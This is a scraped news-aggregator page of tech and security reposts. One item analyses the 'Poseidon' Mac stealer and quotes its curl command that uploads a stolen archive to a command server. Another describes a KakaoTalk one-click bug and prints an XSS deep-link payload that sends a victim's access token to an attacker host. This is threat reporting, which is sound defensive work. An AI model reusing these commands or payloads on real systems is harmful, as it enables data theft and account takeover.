Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows

andreasc
-
0
Infinidat Revolutionizes Enterprise Cyber Storage Protection to Reduce Ransomware and Malware Threat Windows
[ad_1]

Infinidat, a leading provider of enterprise storage solutions, has introduced a new automated cyber resiliency and recovery solution that will revolutionize how enterprises can minimize the impact of ransomware and malware attacks.

Infinidat’s InfiniSafe® Automated Cyber Protection (ACP) is a first-of-its-kind cybersecurity integration solution that is designed to reduce the threat window of cyberattacks, such as ransomware.

Sophisticated cyberattacks, including new sinister forms of AI-driven attacks, are increasingly targeting the data storage infrastructure of enterprises.

Infinidat’s InfiniSafe ACP enables enterprises to easily integrate with their Security Operations Centers (SOC), Security Information and Event Management (SIEM), Security Orchestration, Automation, and Response (SOAR) cybersecurity software applications, and simple syslog functions for less complex environments.

A security-related incident or event triggers immediate automated immutable snapshots of data, providing the ability to protect InfiniBox® and InfiniBox™ SSA block-based volumes and/or file systems and ensure near instantaneous cyber recovery.

“The merging of cybersecurity and data infrastructure has been compelling CIOs, CISOs and IT team leaders to rethink how to secure enterprise storage across hybrid multi-cloud deployments in light of increasing cyberattacks.

Enterprises need proactive strategies, seamless integration across IT domains, and the most advanced, automated technologies to stay ahead of cyber threats,” said Eric Herzog, CMO at Infinidat. Recognized as a cyber secure storage expert, Herzog is coming off participation in a string of cybersecurity panel discussions, roundtables and conference events.

“Infinidat has carved out a very unique leadership position as the only storage vendor to offer an automated enterprise storage cyber protection solution that seamlessly integrates with cyber security software applications,” said Chris Evans, Principal Analyst at Architecting IT.

“Infinidat’s newly launched InfiniSafe Automated Cyber Protection that easily meshes with the SIEM, SOAR or Security Operations Centers is exactly what enterprises need to include enterprise storage as a comprehensive approach to combat cyber threats.”

Infinidat’s new InfiniSafe ACP capability orchestrates the automatic taking of immutable snapshots of data, at the speed of compute, to stay ahead of cyberattacks by decisively cutting off the proliferation of data corruption.

Evans added, “This proactive cyber protection technique is extremely valuable, as it enables taking immediate immutable snapshots of data at the first sign of a potential cyberattack. This provides a significant advancement to ensure enterprise cyber storage resilience and recovery are integral to an enterprise’s cybersecurity strategy.

ACP enhances an enterprise’s overall cyber resilience by reducing the threat window and minimizing the impact of cyberattacks on enterprise storage environments.”

The InfiniSafe Automated Cyber Protection is one of the biggest innovations of the year in cybersecurity because it unlocks the full potential of an enterprise’s security posture and maximizes the investments that an enterprise has made in protecting the business.

By plugging into existing security mechanisms and continuous monitoring, InfiniSafe ACP bridges the gaps between enterprise storage and cybersecurity strategies that can transform the way CIOs and CISOs think about enterprise data infrastructures.                                                                      

Information technology leaders have identified this ability to automate data snapshot commands and data pathways as critical to early detection and worry-free cyber recovery that minimizes the effects of even the most vicious and deceptive cyberattacks of malicious actors.

An enterprise’s security team can put all its information from security operations through an enterprise storage intelligence grid to create the most sensitive triggers that often get missed by existing technologies and techniques.

Paul Rapier, VP of Information Technology at the Detroit Pistons, stated, “Infinidat’s efforts in enhancing cyber resilience for enterprises, particularly through the new InfiniSafe Automated Cyber Protection, are noteworthy for data security.”Allen Shahdadi, Vice President of Global Sales at Sycomp, said, “Infinidat has become synonymous with guaranteed cyber resilient storage.

Infinidat continues to deliver powerful solutions that solve critical cyber issues for enterprises and service providers around the globe. The InfiniSafe Automated Cyber Protection solution brings much needed capabilities to fight more effectively against cyberattacks.

The automatic capture of immutable snapshots of primary data could be the difference between your data being held ransom and the rapid recovery of your data. Before international cybercriminals, hackers and fraudsters can gain an advantage, Infinidat’s InfiniSafe reduces the threat window decisively.” 

The InfiniSafe Automated Cyber Protection solution is the latest in a string of cybersecurity capabilities that Infinidat has brought forward to strengthen enterprise storage in the face of constant threats of a tsunami of cyberattacks.

Infinidat has also unveiled the following extensions of its state-of-the-art cyber resilient capabilities:

  • InfiniSafe Cyber Detection for VMware – Access to InfiniSafe cyber resilience capabilities to combat cyberattacks has been expanded into VMware environments. The impact of a cyberattack can be readily determined through this cyber detection capability, with highly granular insights by leveraging AI and machine learning whether or not a VMware datastore and the VM’s they encompass have been compromised.
  • InfiniSafe Cyber Detection for InfiniGuard® – Cyber detection will be extended onto the InfiniGuard purpose-built backup appliance to help enterprises resist and quickly recover from cyberattacks. This proven capability provides highly intelligent scanning and indexing to identify signs of cyber threats in backup environments, helping ensure that data has integrity. The enhanced version will be available in 2H 2024.

As a leader in cyber resilient storage, Infinidat first unveiled its InfiniSafe software-based platform two years ago with a set of cybersecurity functions. This solution has won numerous awards and has been proven by large global enterprises.

The comprehensive cyber resilience capabilities of InfiniSafe technology improve the ability of an enterprise to combat and protect against ever-increasing cyberattacks and data breaches by uniquely combining immutable snapshots, logical air gapping, fenced/isolated networks, and virtually instantaneous data recovery into a single, high-performance platform.

The InfiniSafe ACP is the latest example of Infinidat’s broadening innovation. It was introduced alongside the launch of the InfiniBox G4 family of next-generation storage arrays for all-flash and hybrid configurations.

The G4 series is a completely new storage array family built from the ground up that substantially extends Infinidat’s cyber storage resilience and delivers up to 2.5x improvement in performance.

The InfiniBox G4 series introduces a new set of foundational elements, powered by InfuzeOS, which is Infinidat’s software defined storage operating system.

Webinar On Demand

To watch Infinidat’s end-user webinar about the new solutions − “The Future of Enterprise Storage, Cyber Security and Hybrid Multi-Cloud” – users can click here.

About Infinidat

Infinidat provides enterprises and service providers with a platform-native primary and secondary storage architecture that delivers comprehensive data services based on InfiniVerse®. This unique platform delivers outstanding IT operating benefits, support for modern workloads across on-premises and hybrid multi-cloud environments. Infinidat’s cyber resilient-by-design infrastructure, consumption-based performance, 100% availability, and cyber security guaranteed SLAs align with enterprise IT and business priorities. Infinidat’s award-winning platform-native data services and acclaimed white glove service are continuously recommended by customers, as recognized by Gartner® Peer Insights reviews. For more information: www.infinidat.com.

Connect with Infinidat

About Infinidat | Blog | Twitter | LinkedIn | Facebook | YouTube | Be our partner

Contact

Director of Global Communications
Sapna Capoor
Infinidat
[email protected]
+44 (0) 7789684159


[ad_2]
Source link

‘Poseidon’ Mac stealer distributed via Google ads

andreasc
-
0
‘Poseidon’ Mac stealer distributed via Google ads
[ad_1]

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/out.zip http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page

Conclusion

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this this ‘Poseidon campaign as OSX.RodStealer and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain

arcthost[.]org

Decoy site

arc-download[.]com

Download URL

zestyahhdog[.]com/Arc12645413[.]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192[.]4/p2p

[ad_2]
Source link

Ring Video Doorbell Plummets to $49.99: Amazon’s Biggest Discount Ever!

andreasc
-
0
Ring Video Doorbell Plummets to $49.99: Amazon’s Biggest Discount Ever!
[ad_1]

The Ring Video Doorbell seamlessly integrates with Amazon’s Alexa ecosystem, providing a comprehensive and convenient solution for monitoring your home’s entrance. With crystal-clear 1080p HD video and two-way audio communication, you can easily see and speak to visitors from anywhere using compatible devices like your Fire TV, Fire Tablet, or Echo Show. Alexa can even notify you when someone is at the door or when a package is delivered, enhancing your awareness and control.

With Ring Protect, you can store and share recorded videos and photos for as little as $3.99 per month per device or $10 for unlimited devices. This subscription enhances security by capturing and retaining valuable footage for future reference, ensuring you never miss a moment.

The Ring Video Doorbell’s battery life typically lasts around a month on a single charge, depending on factors like foot traffic and settings. However, its innovative Quick Release Battery feature makes swapping batteries effortless, minimizing downtime and maintaining continuous surveillance.

In addition to its impressive features and seamless integration, the Ring Video Doorbell offers the added benefit of deterring potential porch pirates. Allowing you to communicate with visitors remotely and record their every move creates a powerful deterrent against theft and enhances the overall security of your home.


[ad_2]
Source link

Fitbit users can now add American Express cards to Google Wallet

andreasc
-
0
Fitbit users can now add American Express cards to Google Wallet
[ad_1]

Image credit — PhoneArena

Fitbit users can now finally add American Express cards to their Google Wallet. This means that those who use Fitbit devices can now utilize their American Express cards for payments through Google Wallet. This feature has been long-awaited since Google replaced Fitbit Pay with Google Wallet, and it has now finally been rolled out as part of the Google Play Services v24.25 update.Previously, Google had mentioned the addition of American Express card support in an earlier update, but later retracted it. However, the feature has been reintroduced in the latest update, and users have reported successfully adding their American Express cards to their Fitbit devices. The official changelog for the update also confirms the addition of this feature.

In addition to American Express card support, the Google Play Services v24.25 update brings several other changes for Google Wallet users. These changes include:

  • The ability to add an e-wallet as a payment method or use linked e-wallets in Google Pay to complete payments on your phone.
  • New features for IDs added to Wallet on your phone.
  • The option to use Pixel as a payment method in Wallet on your phone.

The rollout of American Express card support for Fitbit devices is a significant development for users who have been eagerly awaiting this feature. It provides greater flexibility and convenience for those who prefer to use their American Express cards for payments. The additional changes included in the update further enhance the functionality of Google Wallet, making it a more versatile and comprehensive payment solution.

While Google has not officially confirmed the completion of the rollout, the reports of successful additions and the mention in the official changelog suggest that the feature is now widely available. This update is a welcome addition for Fitbit owners, who can now enjoy the convenience of using their American Express cards for payments on their devices.


[ad_2]
Source link

Poc Exploit Released-Fortra Filecatalyst SQL Injection Vulnerability

andreasc
-
0
Poc Exploit Released-Fortra Filecatalyst SQL Injection Vulnerability
[ad_1]

A Proof-of-Concept (PoC) exploit has been released for a critical SQL Injection vulnerability in Fortra FileCatalyst Workflow.

This vulnerability could potentially allow attackers to modify application data.

This vulnerability, CVE-2024-5276, affects all versions of Fortra FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

The SQL Injection vulnerability, discovered on June 18, 2024, is classified under CWE-20 and CWE-89.

It indicates improper input validation and improper neutralization of special elements used in an SQL command.

The vulnerability has a CVSS v3.1 score of 9.8, reflecting its critical nature (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

This attack exploits target software that constructs SQL statements based on user input.

An attacker can craft input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended.

This vulnerability results from the failure of the application to validate input appropriately.

Potential Impacts

This vulnerability’s likely impacts include creating administrative users and deleting or modifying data in the application database.

However, data exfiltration via SQL injection is not possible with this vulnerability.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled; otherwise, an authenticated user is needed.

The vulnerability affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.

Users of these versions are strongly advised to update their systems to the latest version to mitigate the risk.

Fortra has yet to release an official patch, but users should monitor the vendor’s advisories for updates.

The release of the PoC exploit for this critical SQL Injection vulnerability underscores the importance of timely updates and robust security practices.

Organizations using FileCatalyst Workflow should act swiftly to secure their systems against potential exploitation.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link

Huawei sees AI smartphones taking 90% of the market by 2030

andreasc
-
0
Huawei sees AI smartphones taking 90% of the market by 2030
[ad_1]

AI is all over the place at the moment… as far as technology goes. It’s the current buzzword that is being used. Many smartphone OEMs have included plenty of AI features in their devices. The same goes for Huawei, who believes that AI smartphones will account for 90% of the market by 2030.

This was said by Huawei’s Executive Director and Chairman of the ICT Infrastructure Business Management Committee, Wang Tao. He said it during the keynote speech in Shanghai yesterday.

Huawei believes AI smartphones will take 90% of the market by 2030

He believes that AI-powered smartphones will account for 11% of shipments this year. That could reach the 90% level by 2030, though. He essentially sees the integration of LLMs and AI features becoming a standard for the industry.

Tao said the following: “We will soon see a huge boost to traffic from AI. At the same time, 5G-A networks will be able to provide higher speeds, lower latency, and greater capacity to meet the network demands of the AI ​​era”.

Many smartphones already offer such features and are considered ‘AI smartphones’. Apple joined the fray with the company’s iOS 18 announcement recently. Well, users still don’t have access to all that, at least not in the stable form. Still, they’ll get access in a couple of months.

Companies will be able to run more and more AI tasks locally

When it comes to AI features, your phones need to talk to the server that runs larger LLMs. So for some processes, that is necessary. Companies are expected to be able to do more and more such tasks on smartphones, natively, though. LLMs will be getting more efficient, and processors more powerful and capable in the AI sense.

So, it seems like the AI buzzword is here to stay. Companies likely won’t stop using it, though they may reshape it. Apple, for example, avoided using ‘AI’, and simply calls its features ‘Apple Intelligence’.


[ad_2]
Source link

Xeno RAT Attacking Users Via GitHub Repository And .gg Domains

andreasc
-
0
Xeno RAT Attacking Users Via GitHub Repository And .gg Domains
[ad_1]

Threat actors use RATs because they provide attackers with persistent access to compromised systems, enabling long-term espionage and exploitation.

North Korean hackers and other actors who target the gaming community are using free malware on GitHub called XenoRAT.

Hunt’s research team found it spreading through .gg domains and a GitHub repository that pretended to be Roblox scripting tools.

Xeno RAT Attacking Via GitHub

The ASEC division of AhnLab claimed it had evidence of a North Korea-related group employing Dropbox to send XenoRAT.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

Besides this, one investigator discovered the software in an open directory that the Kimsuky threat group probably controls.

An increasing risk like this uses crafty approaches to reach out to gamers and developers across platforms with numerous tricks.

On XenoRAT’s GitHub page, you will find more advanced features such as HVNC, audio spying, and SOCKS5 reverse proxy.

Communication between clients and the controller is done through TCP sockets, and this follows an identifiable pattern that can be used to identify malicious activities.

The worrying point is that the malware is being distributed in .gg domains, which are popular within the esports community and target gamers. The network IDS rules for detection are available on the ET website.

It shows how threat actors increasingly use well-known platforms and communities to spread their tools.

The discovery of SynapseX.revamped.V1.2.rar, an untrusted file that communicated with .gg sites resulted in the creation of a GitHub repository disguised as Roblox scripting engine.

YouTube Account Associated with Xeno RAT & Quasar Distribution (Source – Hunt.io)

The repository contained several harmful executable files, such as XenoRAT and Quasar. Earlier, this GitHub user recognized one file as XWorm malware.

Further inquiries revealed that a YouTube channel called “P-Denny Gaming” was linked to it, which recommended that users turn off Windows Defender before installing that malware.

YouTube Video Instructing Users to Install Synapse X File (Source – Hunt.io)

The content of the channel, together with its comments, tried to make these malicious files appear genuine.

The XenoRAT and other malware are very dangerous to the gaming communities when distributed through .gg domains as well as on GitHub.

These threats take advantage of gamers’ trust in good-looking tools that may result in the possible theft of personal data, game items, and financial details.

Using open-source platforms for malware distribution increases the chances of widespread infections.

Even if users are inclined to download or install software from sites they regard as trustworthy, they should be extremely careful.

For a safe internet gaming environment, one needs to be extra cautious and doubtful since these complex social engineering ploys most affect the gaming community.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link

Xiaomi 15 Pro to deliver one negative & one positive change

andreasc
-
0
Xiaomi 15 Pro to deliver one negative & one positive change
[ad_1]

Based on the latest information, the Xiaomi 15 Pro will deliver one negative and one positive change. This information comes from Digital Chat Station, by the way, one of the most reliable tipsters out there.

He shared some information about the device via Weibo, a Chinese social media network. He confirmed that the phone will be fueled by the Snapdragon 8 Gen 4 SoC. That much was a given.

The Xiaomi 15 Pro will deliver one negative & one positive change, amongst other things

In addition to that, the Xiaomi 15 Pro is said to include a 2K micro-curved display. An ultrasonic fingerprint scanner will also be included, which was not the case on the Xiaomi 14 Pro. That phone featured an optical in-display fingerprint scanner.

Now, in the title, we mentioned one negative and one positive change in specific. Well, here they are. The negative one has to do with the phone’s main camera. Xiaomi looks set to ditch the variable aperture, at least on this model. The phone will likely still be able to capture outstanding photos, but… having a variable aperture is useful.

Variable aperture has proven to be quite effective on smartphones, for shooting in various different lighting situations, amongst other things. Well, the Xiaomi 15 Pro is said to offer a large aperture, but a fixed one.

The company will utilize a silicon-carbon battery

In regards to the positive change, Xiaomi looks set to adopt new battery tech. The phone will allegedly use a silicon-carbon negative electrode battery. Thanks mainly to that battery, the Xiaomi 15 Pro is said to include a larger battery, and yet weigh less than 200 grams. It is said to feature a 5,500mAh unit.

The Xiaomi 14 and Xiaomi 14 Pro launched back in October last year. They are expected to arrive around the same time this year, if not a bit sooner. The launch event will likely take place in China first yet again.

The Xiaomi 14 Pro didn’t even make it to global markets. The Xiaomi 14 and Xiaomi 14 Ultra did, but not the ‘Pro’ model. It remains to be seen if that will be the case this time around too.


[ad_2]
Source link

Arkansas lawsuit labels Temu shopping app as ‘dangerous malware’

andreasc
-
0
Arkansas lawsuit labels Temu shopping app as ‘dangerous malware’
[ad_1]

Arkansas has sued the makers of the e-commerce platform Temu over alleged deceptive trade practices. The state claims the shopping app is “dangerous malware” abusing system permissions to steal user data. The lawsuit also raises security concerns over the platform’s Chinese origin.

Temu is malware disguised as shopping app, Arkansas lawsuit claims

Launched in the US in 2022, Temu is an online shopping platform owned by PDD Holdings. Originally a Chinese company, PDD Holdings shifted its headquarters to Ireland last year. The firm also runs a separate shopping app called Pinduoduo in China, which security researchers previously labeled as potential spyware. In March 2023, Google briefly removed the latter from the Play Store after some of its “off-Play versions” were found to contain malware.

In his official complaint, Arkansas Attorney General Tim Griffin linked the two apps. Since Temu came several years after Pinduoduo and made its global debut in the US, Griffin believes it was modeled off its Chinese version and may have the same security lapses. “Temu purports to be an online shopping platform, but it is dangerous malware, surreptitiously granting itself access to virtually all data on a user’s cell phone,” the lawsuit begins.

It goes on to make sweeping claims accusing the app’s makers of purposefully designing it to override privacy settings and gain unrestricted access to unnecessary user data. Griffin says Temu sells user data to third parties to make money, violating the privacy rights of Arkansas citizens. The Arkansas AG also pointed to Apple’s now-resolved concerns about the shopping app’s compliance with data security transparency standards in the US and Europe.

Moreover, Griffin’s lawsuit cites findings by an independent research firm saying Temu can potentially hack users. The number of system permissions and the amount of data it can access is too high for a shopping app. It “sneaks” permissions to gain access to the user’s location, saved files, storage device, and more, which aren’t critical to its normal functioning. Temu also collects sensitive or personally identifiable information that it doesn’t need.

Temu’s Chinese ties are a security threat

Arkansas’ lawsuit against Temu goes beyond labeling it as “malware” and raises security concerns over the app’s Chinese ties. Griffin says Temu’s leadership team is “a cadre of former Chinese Communist Party officials.” As such, the platform is a significant security threat to US citizens. This lawsuit seeks an order enjoining the platform’s deceptive trade practices and privacy violations. It also seeks civil penalties and other monetary and equitable relief.

“Temu is not an online marketplace like Amazon or Walmart. It is a data-theft business that sells goods online as a means to an end,” Griffin said in an official statement. “Though it is known as an e-commerce platform, Temu is functionally malware and spyware. It is purposefully designed to gain unrestricted access to a user’s phone operating system. It can override data privacy settings on users’ devices, and it monetizes this unauthorized collection of data.”


[ad_2]
Source link

1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution

andreasc
-
0
1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution
[ad_1]

KakaoTalk is an Android application that is predominantly installed and used by over 100 million people.

It is a widely popular application in South Korea that has payment, ride-hailing services, shopping, email etc., But the end-to-end encryption is not enabled by default on KakaoTalk as it is an opt-in feature under the name “Secure Chat”. 

Further, this End-to-end encryption is not supported in group messaging or voice calling.

However, KakaoTalk has been discovered with a critical vulnerability that could allow an unauthorized remote threat actor to leak an access token of a victim via an HTTP request header. 

In addition, this token can also be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.

This vulnerability has been assigned with CVE-2023-51219 and the severity is yet to be categorized.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

1-Click Exploit Vulnerability

According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity webview which has multiple attack points as follows:

  • It can be started with a Deep link (adb shell am start kakaotalk://buy)
  • Javascript enabled
  • supports Intent:// that can be used to send data to other non-exported app components via JS
  • No sanitization
  • Leaks an Authorization HTTP header that can be done through Netcat listener in a terminal window and running the $ adb shell am start kakaotalk://buy to start the CommerceBuyActivity WebView

However, though there is an option to leak the Authorization header using GET request, there is small validation there that prevents an attacker from loading any arbitrary attacker-controlled URLs.

To overcome this issue, the code was analyzed which provided information that the path, query and fragment of the URL are using the attacker’s input.

URL Redirect To DOM XSS

As KakaoTalk has a same origin policy that does not load any arbitrary URLs, researchers were checking to see if there are any kakao domains that are vulnerable to DOM XSS.

There was one endpoint identified that was vulnerable to redirection to any kakao domain.

To leverage this same site open-redirect for malicious purposes, there was an XSS flaw discovered.

This XSS flaw was found in the m.shoppinghow.kakao.com subdomain which used DOM Invader Canary string and already had an Stored XSS payload. The XSS payload was so simple which was “><img src=x onerror=alert(1);>. 

So combining this XSS, attackers created a malicious deep link which was kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.

This leaked the user’s access token via the Authorization header which was then sent to the attacker-controlled server by encoding the attacker URL to base64.

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>

As a matter of fact, this token can be used to take over the victim’s Kakao mail account that was used for registration.

Additionally, if the user does not have a Kakao mail account, an attacker can still create a new Kakao Mail account and see the chat messages. 

Furthermore, another interesting thing is that the Kakao Mail account overwrites the user’s previous registered mail address without any additional checks.

Further the researchers have also detailed about password reset, via Burp, malicious Deep link creation and a Proof-of-concept has also been published on GitHub.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link
1...808182...1,456Page 81 of 1,456